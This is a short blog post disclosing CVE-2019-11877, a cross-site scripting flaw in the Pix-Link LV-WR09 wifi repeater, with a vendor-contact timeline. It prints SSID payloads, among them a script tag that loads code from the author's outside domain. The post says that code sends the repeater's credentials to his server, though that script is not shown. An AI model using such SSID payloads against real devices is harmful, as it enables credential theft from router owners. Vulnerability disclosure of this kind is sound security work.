[CVE-2019–11877] Credentials Stealing Through XSS on Pix-Link Repeater

Igor Gomes
May 27 · 2 min read

I was needing a wifi repeater for my house and bought a Pix-Link LV-WR09 for being one of the cheapest. I thought “What could go wrong with that?”

When I entered the repeater configuration page I saw that in the network listing function it could be vulnerable to a Cross-Site Scripting attack over a wifi network with the malicious BSSID.

I used my smartphone to create a wifi network named

<script>alert(‘XSS’)</script> 

And did the test:

Yes! He’s vulnerable!!

Now it’s time to make a real attack.


The SSID has the restriction to fit a maximum of 32 characters, so I registered a small enough domain:

http://ilrg.xyz/

I changed the SSID in my smartphone to <script scr=//ilrg.xyz></script> and in the index.html I put my script:

Now I just need to go to the settings page of the repeater and scan for available networks.

It will run the XSS and send the data to a file on my server.

It worked!

With this we have a POC!

Sources that served as inspiration:

http://foofus.net/goons/percx/papers/Practical_Exploitation_Using_Malicious_SSIDs.pdf

https://medium.com/caio-noobs-around/roteador-tc7337-dns-poisoning-atrav%C3%A9s-de-xss-1a92ed254120

https://fireshellsecurity.team/cve-2017-14219-xss-no-roteador-intelbras-wrn-240/

Timeline:

28/04/2019 — First email sent to the vendor (no answer)

06/05/2019 — Second email sent to the vendor (no answer)

15/05/2019 — Third email sent to the vendor (no answer)

27/05/2019 — Disclosure

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade